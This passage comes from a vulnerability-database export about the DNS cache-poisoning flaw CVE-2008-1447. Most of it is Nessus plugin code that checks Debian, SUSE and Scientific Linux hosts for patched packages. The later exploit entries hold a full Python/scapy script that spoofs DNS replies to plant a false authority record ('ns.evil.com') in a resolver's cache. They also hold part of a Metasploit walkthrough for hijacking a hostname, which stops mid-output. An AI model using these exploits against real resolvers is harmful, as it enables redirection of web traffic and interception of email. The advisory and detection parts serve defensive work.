security_hole(port:53, proto: \"udp\", extra: report);\n}\nelse\n{\n audit(AUDIT_LISTEN_NOT_VULN, \"DNS\", port);\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2017-10-29T13:39:11", "edition": 2, "description": "Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting.", "published": "2008-07-10T00:00:00", "type": "nessus", "title": "Debian DSA-1604-1 : bind - DNS cache poisoning", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "cpe": ["cpe:/o:debian:debian_linux"], "modified": "2013-06-03T00:00:00", "id": "DEBIAN_DSA-1604.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33451", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated advisory does not \n# have any package tests.\n#\n# Disabled on 2012/01/20.\n#\n\n# This script was automatically generated from Debian Security \n# Advisory DSA-1604. It is released under the Nessus Script \n# Licence.\n#\n# Debian Security Advisory DSA-1604 is (C) Software in the Public\n# Interest, Inc; see http://www.debian.org/license for details.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33451);\n script_version(\"$Revision: 1.16 $\");\n script_cvs_date(\"$Date: 2013/06/03 16:47:17 $\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_osvdb_id(47232, 47916, 47926, 47927, 48245);\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"DSA\", value:\"1603\");\n script_xref(name:\"DSA\", value:\"1604\");\n\n script_name(english:\"Debian DSA-1604-1 : bind - DNS cache poisoning\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"The BIND 8 legacy code base could not be updated to include the\nrecommended countermeasure (source port randomization, see DSA-1603-1\nfor details). There are two ways to deal with this situation :\n\n 1. Upgrade to BIND 9 (or another implementation with \n source port randomization). The documentation included\n with BIND 9 contains a migration guide. \n\n 2. Configure the BIND 8 resolver to forward queries to a \n BIND 9 resolver. Provided that the network between \n both resolvers is trusted, this protects the BIND 8 \n resolver from cache poisoning attacks (to the same \n degree that the BIND 9 resolver is protected). \n\nThis problem does not apply to BIND 8 when used exclusively as an\nauthoritative DNS server. It is theoretically possible to safely use\nBIND 8 in this way, but updating to BIND 9 is strongly recommended. \nBIND 8 (that is, the bind package) will be removed from the etch\ndistribution in a future point release.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2008-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\n# Deprecated.\nexit(0, \"The associated advisory does not have any package tests.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-01-17T13:44:00", "description": "The dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : dnsmasq on SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080811_DNSMASQ_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60462", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60462);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Scientific Linux Security Update : dnsmasq on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Scientific Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0808&L=scientific-linux-errata&T=0&P=1051\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5409951d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-06T09:45:04", "description": "In DSA-1603-1, Debian released an update to the BIND 9 domain name\nserver, which introduced UDP source port randomization to mitigate the\nthreat of DNS cache poisoning attacks (identified by the Common\nVulnerabilities and Exposures project as CVE-2008-1447 ). The fix,\nwhile correct, was incompatible with the version of SELinux Reference\nPolicy shipped with Debian Etch, which did not permit a process\nrunning in the named_t domain to bind sockets to UDP ports other than\nthe standard 'domain' port (53). The incompatibility affects both the\n'targeted' and 'strict' policy packages supplied by this version of\nrefpolicy.\n\nThis update to the refpolicy packages grants the ability to bind to\narbitrary UDP ports to named_t processes. When installed, the updated\npackages will attempt to update the bind policy module on systems\nwhere it had been previously loaded and where the previous version of\nrefpolicy was 0.0.20061018-5 or below.\n\nBecause the Debian refpolicy packages are not yet designed with policy\nmodule upgradeability in mind, and because SELinux-enabled Debian\nsystems often have some degree of site-specific policy customization,\nit is difficult to assure that the new bind policy can be successfully\nupgraded. To this end, the package upgrade will not abort if the bind\npolicy update fails. The new policy module can be found at\n/usr/share/selinux/refpolicy-targeted/bind.pp after installation.\nAdministrators wishing to use the bind service policy can reconcile\nany policy incompatibilities and install the upgrade manually\nthereafter. A more detailed discussion of the corrective procedure may\nbe found on\nhttps://wiki.debian.org/SELinux/Issues/BindPortRandomization.", "edition": 27, "published": "2008-07-28T00:00:00", "title": "Debian DSA-1617-1 : refpolicy - incompatible policy", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-28T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:refpolicy", "cpe:/o:debian:debian_linux:4.0"], "id": "DEBIAN_DSA-1617.NASL", "href": "https://www.tenable.com/plugins/nessus/33737", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1617. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33737);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"DSA\", value:\"1617\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Debian DSA-1617-1 : refpolicy - incompatible policy\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In DSA-1603-1, Debian released an update to the BIND 9 domain name\nserver, which introduced UDP source port randomization to mitigate the\nthreat of DNS cache poisoning attacks (identified by the Common\nVulnerabilities and Exposures project as CVE-2008-1447 ). The fix,\nwhile correct, was incompatible with the version of SELinux Reference\nPolicy shipped with Debian Etch, which did not permit a process\nrunning in the named_t domain to bind sockets to UDP ports other than\nthe standard 'domain' port (53). The incompatibility affects both the\n'targeted' and 'strict' policy packages supplied by this version of\nrefpolicy.\n\nThis update to the refpolicy packages grants the ability to bind to\narbitrary UDP ports to named_t processes. When installed, the updated\npackages will attempt to update the bind policy module on systems\nwhere it had been previously loaded and where the previous version of\nrefpolicy was 0.0.20061018-5 or below.\n\nBecause the Debian refpolicy packages are not yet designed with policy\nmodule upgradeability in mind, and because SELinux-enabled Debian\nsystems often have some degree of site-specific policy customization,\nit is difficult to assure that the new bind policy can be successfully\nupgraded. To this end, the package upgrade will not abort if the bind\npolicy update fails. The new policy module can be found at\n/usr/share/selinux/refpolicy-targeted/bind.pp after installation.\nAdministrators wishing to use the bind service policy can reconcile\nany policy incompatibilities and install the upgrade manually\nthereafter. A more detailed discussion of the corrective procedure may\nbe found on\nhttps://wiki.debian.org/SELinux/Issues/BindPortRandomization.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=490271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-1447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wiki.debian.org/SELinux/Issues/BindPortRandomization\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1617\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the refpolicy packages.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.0.20061018-5.1+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:refpolicy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-dev\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-doc\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-src\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-strict\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-targeted\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:03:07", "description": "This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : dnsmasq (dnsmasq-147)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:dnsmasq"], "id": "SUSE_11_0_DNSMASQ-080813.NASL", "href": "https://www.tenable.com/plugins/nessus/39951", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dnsmasq-147.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39951);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"openSUSE Security Update : dnsmasq (dnsmasq-147)\");\n script_summary(english:\"Check for the dnsmasq-147 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=411761\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "seebug": [{"lastseen": "2017-11-19T21:29:49", "description": "BUGTRAQ ID: 31017\r\nCVE ID\uff1aCVE-2008-3350\r\nCNCVE ID\uff1aCNCVE-20083350\r\n\r\nDnsmasq\u662f\u4e00\u6b3e\u8f7b\u91cf\u7ea7\u7684DNS\u670d\u52a1\u7a0b\u5e8f\u3002\r\nDnsmasq\u5904\u7406\u79df\u671f\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n-\u5f53\u672a\u77e5\u5ba2\u6237\u7aef\u5c1d\u8bd5\u5237\u65b0DHCP\u79df\u671f\u65f6\u5b58\u5728\u95ee\u9898\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u3002\r\n-\u5f53\u4e00\u4e2a\u6ca1\u6709\u79df\u671f\u7684\u4e3b\u673a\u5904\u7406DHCPINFORM\u65f6\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u3002\n\nGentoo net-dns/dnsmasq 2.43\r\nDnsmasq Dnsmasq 2.43\n \u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\uff1a\r\n<a href=http://www.thekelleys.org.uk/dnsmasq/doc.html target=_blank>http://www.thekelleys.org.uk/dnsmasq/doc.html</a>", "published": "2008-09-10T00:00:00", "title": "Dnsmasq DCHP\u79df\u671f\u591a\u4e2a\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3350"], "modified": "2008-09-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3994", "id": "SSV:3994", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T21:33:51", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17308", "id": "SSV:17308", "sourceData": "\n from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = "X.X.X.X"\n# Vulnerable recursive DNS server\ntargetdns = "X.X.X.X"\n# Authoritative NS for the target domain\nsrcdns = ["X.X.X.X"]\n\n# Domain to play with\ndummydomain = ""\nbasedomain = ".example.com."\n# sub-domain to claim authority on\ndomain = "sub.example.com."\n# Spoofed authoritative DNS for the sub-domain\nspoof="ns.evil.com."\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = "a" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint "Successfully poisonned our target with a dummy record !!"\n\t\t\tbreak\n\texcept:\n\t\tprint "Poisonning failed"\n\n# milw0rm.com [2008-07-24]\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17308"}, {"lastseen": "2017-11-19T21:33:48", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (meta)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-9165", "id": "SSV:9165", "sourceData": "\n ____ ____ __ __\r\n / \\ / \\ | | | |\r\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\r\n \\____/ |__| |__| \\______/\r\n \r\n Computer Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0002\r\nRelease Date: 2008.07.23\r\nTitle: bailiwicked_host.rb\r\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit\r\nTested: BIND 9.4.1-9.4.2\r\nAttributes: Remote, Poison, Resolver, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt\r\nAuthor/Email: I)ruid <druid (@) caughq.org>\r\n H D Moore <hdm (@) metasploit.com>\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\r\nwhich allow the insertion of malicious DNS records into the cache of the\r\ntarget nameserver. This exploit caches a single malicious host entry\r\ninto the target nameserver. By causing the target nameserver to query\r\nfor random hostnames at the target domain, the attacker can spoof a\r\nresponse to the target server including an answer for the query, an\r\nauthority server record, and an additional record for that server,\r\ncausing target nameserver to insert the additional record into the\r\ncache.\r\n\r\n\r\nExample\r\n=======\r\n\r\n# /msf3/msfconsole\r\n\r\n _ _ _ _\r\n | | | | (_) |\r\n _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_\r\n| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __|\r\n| | | | | | __/ || (_| \\__ \\ |_) | | (_) | | |_\r\n|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__|\r\n | |\r\n |_|\r\n\r\n\r\n =[ msf v3.2-release\r\n+ -- --=[ 298 exploits - 124 payloads\r\n+ -- --=[ 18 encoders - 6 nops\r\n =[ 72 aux\r\n\r\nmsf > use auxiliary/spoof/dns/bailiwicked_host\r\nmsf auxiliary(bailiwicked_host) > show options\r\n\r\nModule options:\r\n\r\n Name Current Setting Required Description\r\n ---- --------------- -------- -----------\r\n HOSTNAME pwned.example.com yes Hostname to hijack\r\n NEWADDR 1.3.3.7 yes New address for hostname\r\n RECONS 208.67.222.222 yes Nameserver used for reconnaissance\r\n RHOST yes The target address\r\n SRCPORT yes The target server's source query port (0 for automatic)\r\n XIDS 10 yes Number of XIDs to try for each query\r\n\r\nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D\r\nRHOST => A.B.C.D\r\n\r\nmsf auxiliary(bailiwicked_host) > check\r\n[*] Using the Metasploit service to verify exploitability...\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\r\n\r\nmsf auxiliary(bailiwicked_host) > set SRCPORT 0\r\nSRCPORT => 0\r\n\r\nmsf auxiliary(bailiwicked_host) > run\r\n[*] Switching to target port 48178 based on Metasploit service\r\n[*] Targeting nameserver A.B.C.D\r\n[*] Querying recon nameserver for example.com.'s nameservers...\r\n[*] Got answer with 2 answers, 0 authorities\r\n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.\r\n[*] Querying recon nameserver for address of 